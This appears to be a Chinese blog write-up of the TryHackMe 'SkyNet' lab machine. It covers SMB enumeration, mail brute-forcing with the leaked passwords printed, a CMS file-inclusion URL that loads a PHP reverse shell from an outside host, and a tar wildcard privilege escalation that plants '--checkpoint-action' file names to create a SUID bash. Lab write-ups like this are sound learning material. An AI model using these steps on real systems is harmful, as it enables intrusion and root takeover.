扫描打点
看到
445有samba,试试匿名连接,里面有个attention.txt和logs文件夹
只有
log1有东西,看起来像密码,其他两个都是空的
看不出有什么东西,看提示是枚举
sambaenum4linux -a -o 10.10.3.119爆一下找到了(可能的)
id:milesdyson
这里耻辱看题解,发现应该扫那个网站,感觉是前面不需要扫站的靶机打多了啊嗯
扫出来的
admin404了,但/squirrelmail还可以访问
想到刚刚的用户名和长得像密码本的东西,爆破一下试试
burp明显慢好多啊
看这个长度密码应该就是
cyborg007haloterminator成功登入后台
getshell后台乱找一找先:
找到
smb的密码:)s{A&2Z=F^n_E.B`剩下两封邮件是意义不明的明文及二进制下的
balls have zero to me to me to me,但可惜我没看过终结者,get不到这个点那就去连
smb试试:smbclient -U milesdyson //10.10.3.119/milesdyson
首先那几个大型的
pdf被忽略了,然后切到notes,发现好多md文件里面多出来一个important:
切到那个
CMS的网页里,又是个彩蛋再次耻辱看题解,要再扫一次这个
CMS下的目录:
找到
http://10.10.3.119/45kra24zxs28v3yd/administrator/
有了
CMS型号就好很多了,直接搜搜:幽默msf怎么没搜到
去看一眼,好像是个文件包含,要包含个
php反弹shellkali自带的在
/usr/share/webshells/php改一下地址,根据
poc所说的访问:http://10.10.3.119/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.11.99.99:9000/php-reverse-shell.phptar命令linux提权先传个反弹
shell到msf上再说
本来计划仿照
kenobi那样,但好像不行:
之前用过的
sudo -l也不行耻辱看题解 $\times 3$
要看计划任务
cat /etc/crontab
看到这个
backup有root的权限,试着改一改:
哦没权限啊那没事了看一下内容,是一个每分钟的定时任务,打包一下
var/www/html
啊嗯接着看题解:
可以从 GTFObins 查到
tar命令的root提权方法:tar命令存在一个-checkpoint参数,其允许每次归档X文件后显示进度消息。但重点是其可以和另一个标志-checkpoint-action连用,可以在每次触发检查点的时候以二进制或脚本形式进行一些操作也就是说可以写一个提权脚本,让
-checkpoint-action激活它,同时把-checkpoint设小一点以便更快的激活这么做的前提是
backup脚本使用了通配符*归档的是全部文件,所以直接加到目录下面就可以在
var/www/html下新建一个bash脚本,其将创建一个bash的副本echo "cp /bin/bash /tmp/qwq && chmod +s /tmp/qwq" > qwq.sh再去做剩下两个参数:
1
2touch "/var/www/html/--checkpoint=1"
touch "/var/www/html/--checkpoint-action=exec=sh qwq.sh"这里这两个文件名就相当于参数被注入进去一样了,最后执行的命令就类似于
1
2tar cf /home/milesdyson/backups/backup.tgz --checkpoint=1
tar cf /home/milesdyson/backups/backup.tgz --checkpoint-action=exec=sh
放进去静置一分钟(雾
就能在脚本里面的路径:
/tmp下面找到有着SUID权限的qwq了
理论上现在直接
qwq -p就提权了,但这里靶机一直卡,已经神志不清了
THM打靶日寄6-SkyNet
- 本文链接: http://noone40404.github.io/2024/09/13/THM打靶日寄6:SkyNet/
- 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!